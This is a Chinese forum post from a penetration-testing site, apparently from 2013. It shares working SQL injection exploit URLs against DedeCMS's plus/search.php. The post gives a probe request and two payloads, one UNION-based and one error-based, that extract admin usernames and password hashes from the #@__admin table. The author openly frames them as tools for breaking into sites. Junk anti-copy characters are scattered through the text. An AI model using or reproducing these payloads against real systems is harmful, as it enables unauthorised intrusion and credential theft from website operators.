中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
8 \5 X! W! c0 Z
' ^- Z# B; T0 F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。+ {9 |+ i! R; y8 g7 o0 h
6 X4 b, S5 V0 C- k. a
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% o; O- T: `6 @* O/ I9 v6 j8 G& {
我一般是这样测试的:
$ e3 F( E* d3 N( _
1 h2 a% J/ y8 G  |" e提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a2 d/ _8 e& O0 L6 G" r
) T1 V  l7 K/ A" Y
转载不加作者名的没JJ
8 c, N9 q! V5 i* p- D5 [! ~$ K
, F  f& B7 E% ]作者:鬼哥5 `, c* Q) `9 G" s4 a

' c- p  l! u& V) Q% ` 3 j$ o+ Z9 I$ E. `
9 ?4 k1 h$ Y/ I3 D
看结果如果提示& s3 q- o- I5 P$ C, S- o% A
7 H& n7 X" \0 ?% y. p" j- e
Safe Alert: Request Error step 2 !7 |. j* }9 X$ ^# B  a, |
" @. _4 a- X  a8 N, F
那么直接用下面的exp
- V: z( I6 j, L4 j/ {) L
- d) @$ I" X. Z/ Axx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
$ c6 P; F1 Y4 ], q. J& G% E" k3 c2 e+ A) u/ y
  v' }, T% j* H9 b: e
看结果如果提示! E. W' ]0 W! P  n# @

# a  E/ t! @, z3 l' u: o& L8 DSafe Alert: Request Error step 1 !3 ]$ \2 a; i8 j1 ?6 _; q
  _* g- P, x: d. ~' j
那么直接用下面的exp9 A" b- m& A4 e! H4 D9 O* v$ K

" I$ {2 W7 ]) Q* A# zxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# j, Q+ T5 H* _) e) K

, N1 P" f( C* e1 |- ~1 v
' F2 J3 H2 }) w8 z+ ?" T如果正常显示证明漏洞不存在了。
& ?- Y3 Z6 W# P+ y1 u' a& T1 l! D4 @7 Q- P% Z( W" H
转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2